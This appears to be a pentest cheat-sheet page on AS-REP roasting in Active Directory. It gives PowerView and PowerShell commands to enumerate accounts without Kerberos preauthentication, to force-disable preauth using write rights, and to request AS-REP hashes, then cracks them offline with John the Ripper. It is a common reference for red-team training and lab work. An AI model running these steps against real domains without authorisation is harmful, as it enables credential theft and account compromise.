# AS-REP Roast

<figure><img src="https://3740919960-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Am0a4hPyOcUCfhPUAm9%2Fuploads%2FvOkGd0hf3yh6SczNiMgX%2Fimage.png?alt=media&#x26;token=c20dacdb-bfa0-47f3-8b90-b97c11378c93" alt=""><figcaption></figcaption></figure>

### Targeted Kerberoasting - AS-REPs

* If a user's UAC setting has preauthentication disabled, then it is possible to grab user's crackable AS-REP (Authentication Service Response) and bruteforce it offline.
* With GenericWrite or GenericAll rights, Kerberos preauth can be forced disabled as well.

Enumerate accounts with Kerberos Preauth disabled:

{% code overflow="wrap" %}

```powershell
# PowerView
Get-DomainUser -PreauthNotRequired -Verbose

# AD module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
```

{% endcode %}

Force disable Kerberos Preauth and enumerate the permissions for RDPUsers on ACL using PowerView

{% code overflow="wrap" %}

```powershell
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} -Verbose

Get-DomainUser -PreauthNotRequired -Verbose
```

{% endcode %}

Request encrypted AS-REP for offline bruteforce.

Let's use ASREPRoast

{% code overflow="wrap" %}

```powershell
Get-ASREPHash -UserName VPN1user -Verbose
```

{% endcode %}

To enumerate all users with Kerberos preauth disabled and request a hash:

```powershell
Invoke-ASREPRoast -Verbose
```

Finally, crack the hashes offline:

{% code overflow="wrap" %}

```
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-
pass.txt C:\AD\Tools\asrephashes.txt
```

{% endcode %}